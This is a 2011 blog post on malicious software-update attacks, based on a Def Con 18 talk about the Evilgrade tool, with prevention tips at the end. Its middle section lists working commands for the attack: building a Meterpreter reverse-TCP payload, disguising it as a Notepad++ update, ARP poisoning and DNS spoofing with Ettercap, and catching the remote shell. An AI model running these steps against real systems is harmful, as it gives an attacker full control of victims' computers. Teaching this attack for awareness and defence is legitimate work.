Thursday, March 24, 2011

Beware of Malicious Updates/Patches

As I was viewing the video presentations from Def Con 18, I came across a unique and incredible pwnage technique to control a PC.  The presentation displayed the insecurity of upgrading/patching versions of 3rd party applications through a tool named, Evilgrade.  In essence, when an individual updates an application; such as, iTunes, Java, Notepad Plus, and 63 other applications as of date, the download maybe a malicious software being installed.  This scenario would be a targeted attack.  In other words, an attacker would scan a network for an IP address or target a known individual IP address, and wait for the victim to open a certain application.  When the victim opens the application, there will be a notification for a new update and most likely (near 100%) the victim will click yes to update the software.

For the intended (safe) software upgrade installation, the process would go through the following steps - in layman - description:

1. The application - I will use Notepad Plus, since that is what I used in the video below - will notify the user of an update when started.

2. The computer will contact Notepad Plus update server and the server will reply back the computer.

3.  Notepad Plus from the user's computer searches the update file from the Notepad Plus server.

4. Finally, the user's  computer will download and execute the file to the latest version.

For a targeted attack to a victim's PC accepting the latest version of a certain application, the process would be:

1. The attacker will target a PC's IP address and use different toolkits to modify the IP address of Notepad Plus server to the attacker's machine.  The attacker waits for the victim to open the Notepad Plus.

2. Notepad Plus will notify the user of an update when started.

3. When the victim clicks "OK," their machine will obtain the malicious software from the attacker's machine.

4. Now, the attacker will have full control over the victim's machine with the whole update process seemingly normal and nothing out of character.

Cracking Tutorial Video:

Beware of Malicious Updates/Patches from Surapheal Belay on Vimeo.

Command Lines:

  • cd /pentest/exploits/framework3
  • ./msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=4444 X > /root/fakeupdate.exe
  • clear
  • cd
  • cd isr-evilgrade
  • ./evilgrade
  • config notepadplus
  • show options
  • set agent '["<%OUT%>/root/fakeupdate.exe<%OUT%>"]'
  • I went to directory, /usr/share/ettercap
  • Edit etter.dns file
  • Add the appropriate URL and your IP address in the displayed location 
  • Open Ettercap
  • Select 'Sniff'/'Unified Sniffing'/Click OK for the correct network interface used
  • Select 'Host'/'Scan for Hosts'
  • Select 'Host'/'Host List'
  • Select the target IP address and click on 'Add to Target 1'
  • Select 'Mitm'/'ARP Poisoning'/Click OK
  • Select 'Start'/'Start Sniffing'
  • Select 'Plugins'/'Manage Plugins'/Click 'dns_spoof'/Minimize Ettercap window
  • Go back to the console for Evilgrade and type 'start' and hit enter
  • Start a new console
  • cd /pentest/exploits/framework3
  • ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST= LPORT=4444 E
  • Hit enter and wait for Metasploit to start the payload
  • Now, just wait for the victim to check for updates or the PC notify the user of an update
  • YES! We have a meterpreter session!
  • From here, we have complete access to the victim's computer.
  • You can view in the video the different commands I demonstrate to confirm that I have control of the victim's PC.

Prevention Tips:

1. It's tedious and annoying but do not go through the application or click on the taskbar to update to the current version.  Go directly to the website to find the download link or scan your PC with Secunia PSI or File Hippo to find out-of-date applications.

2. Do not patch your system on an open wireless network.  Do it within a secure network or at home.

3. Most software companies have a publisher's certificate which verifies the authenticity of the organization.  You may view the certificate through the following steps:

  • In Windows Vista or 7, right-click the executable file and select 'Run as Administrator.'
  • Click the down arrow to show details.
  • Click 'Show more information about this publisher's certificate.'
  • Under the 'General' tab, verify that it was issued to the correct organization and the validation dates are not expired.
  • Select 'Certification Path' and in the box below, make sure that it states the certificate is OK.

4. If available, verify the hash algorithm.  You can download HashCalc from SlavaSoft to verify the integrity of the file with the hash provided by the developers.  Basically, a hash is digital fingerprint.  If there is the slightest modification, the hash provided and the calculated hash with HashCalc will be a entirely different output.  Use HashCalc in the following steps:

  • Open HashCalc and check the appropriate algorithm the developer has provided.
  • Change data format to file.
  • In the data box on the right hand side is a button with 3 dots, click it and navigate to where you downloaded your file and select it, click open.
  • Now, press calculate.
  • Depending on your computer speed, there will be a string next to the selected hash, this is the calculated hash of your file.
  • Compare your selected hash to the developer's hash on the download page.
  • If they are the same then your file is good; if not, your file is corrupt and you need to download it again.

No comments:

Post a Comment